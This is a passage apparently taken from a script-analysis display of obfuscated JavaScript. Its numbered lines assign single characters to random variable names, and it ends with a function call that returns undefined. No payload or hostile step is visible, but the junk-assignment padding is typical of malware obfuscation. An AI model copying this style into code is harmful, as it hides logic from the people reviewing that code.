                                                                                                                                                                                                                                                                                      qozwbvlw = "I";
                                                                                                                                                                                                                                                                                        138
                                                                                                                                                                                                                                                                                        qozwbvlw = "a";
                                                                                                                                                                                                                                                                                          139
                                                                                                                                                                                                                                                                                          sbszjfzf = "q";
                                                                                                                                                                                                                                                                                            140
                                                                                                                                                                                                                                                                                            sbszjfzf = "X";
                                                                                                                                                                                                                                                                                              141
                                                                                                                                                                                                                                                                                              sbszjfzf = "y";
                                                                                                                                                                                                                                                                                                142
                                                                                                                                                                                                                                                                                                lqsfs = "i";
                                                                                                                                                                                                                                                                                                  143
                                                                                                                                                                                                                                                                                                  lqsfs = "(";
                                                                                                                                                                                                                                                                                                    144
                                                                                                                                                                                                                                                                                                    qjgmfvcu = "g";
                                                                                                                                                                                                                                                                                                      145
                                                                                                                                                                                                                                                                                                      qjgmfvcu = "I";
                                                                                                                                                                                                                                                                                                        146
                                                                                                                                                                                                                                                                                                        qjgmfvcu = "j";
                                                                                                                                                                                                                                                                                                          147
                                                                                                                                                                                                                                                                                                          qjgmfvcu = "G";
                                                                                                                                                                                                                                                                                                            148
                                                                                                                                                                                                                                                                                                            qjgmfvcu = "d";
                                                                                                                                                                                                                                                                                                              149
                                                                                                                                                                                                                                                                                                              qrlqb = "U";
                                                                                                                                                                                                                                                                                                                150
                                                                                                                                                                                                                                                                                                                qrlqb = "o";
                                                                                                                                                                                                                                                                                                                  151
                                                                                                                                                                                                                                                                                                                  qrlqb = "G";
                                                                                                                                                                                                                                                                                                                    152
                                                                                                                                                                                                                                                                                                                    qrlqb = "J";
                                                                                                                                                                                                                                                                                                                      153
                                                                                                                                                                                                                                                                                                                      qrlqb = "b";
                                                                                                                                                                                                                                                                                                                        154
                                                                                                                                                                                                                                                                                                                        zxfxct = "M";
                                                                                                                                                                                                                                                                                                                          155
                                                                                                                                                                                                                                                                                                                          zxfxct = "X";
                                                                                                                                                                                                                                                                                                                            156
                                                                                                                                                                                                                                                                                                                            zxfxct = "k";
                                                                                                                                                                                                                                                                                                                              157
                                                                                                                                                                                                                                                                                                                              winfhg = "f";
                                                                                                                                                                                                                                                                                                                                158
                                                                                                                                                                                                                                                                                                                                tcpbwcfzj = "I";
                                                                                                                                                                                                                                                                                                                                  159
                                                                                                                                                                                                                                                                                                                                  tcpbwcfzj = "t";
                                                                                                                                                                                                                                                                                                                                    160
                                                                                                                                                                                                                                                                                                                                    tcpbwcfzj = "C";
                                                                                                                                                                                                                                                                                                                                      161
                                                                                                                                                                                                                                                                                                                                      tcpbwcfzj = "]";
                                                                                                                                                                                                                                                                                                                                        162
                                                                                                                                                                                                                                                                                                                                        ygzoksh = "F";
                                                                                                                                                                                                                                                                                                                                          163
                                                                                                                                                                                                                                                                                                                                          ygzoksh = "R";
                                                                                                                                                                                                                                                                                                                                            164
                                                                                                                                                                                                                                                                                                                                            ygzoksh = "W";
                                                                                                                                                                                                                                                                                                                                              165
                                                                                                                                                                                                                                                                                                                                              ygzoksh = "h";
                                                                                                                                                                                                                                                                                                                                                166
                                                                                                                                                                                                                                                                                                                                                skknkdf = "S";
                                                                                                                                                                                                                                                                                                                                                  167
                                                                                                                                                                                                                                                                                                                                                  skknkdf = "d";
                                                                                                                                                                                                                                                                                                                                                    168
                                                                                                                                                                                                                                                                                                                                                    skknkdf = "C";
                                                                                                                                                                                                                                                                                                                                                      169
                                                                                                                                                                                                                                                                                                                                                      skknkdf = "g";
                                                                                                                                                                                                                                                                                                                                                        170
                                                                                                                                                                                                                                                                                                                                                        skknkdf = "9";
                                                                                                                                                                                                                                                                                                                                                          171
                                                                                                                                                                                                                                                                                                                                                          igispruv = "q";
                                                                                                                                                                                                                                                                                                                                                            172
                                                                                                                                                                                                                                                                                                                                                            vjcuinvfp ( );
                                                                                                                                                                                                                                                                                                                                                            • vjcuinvfp() ➔ undefined
                                                                                                                                                                                                                                                                                                                                                            Reset < >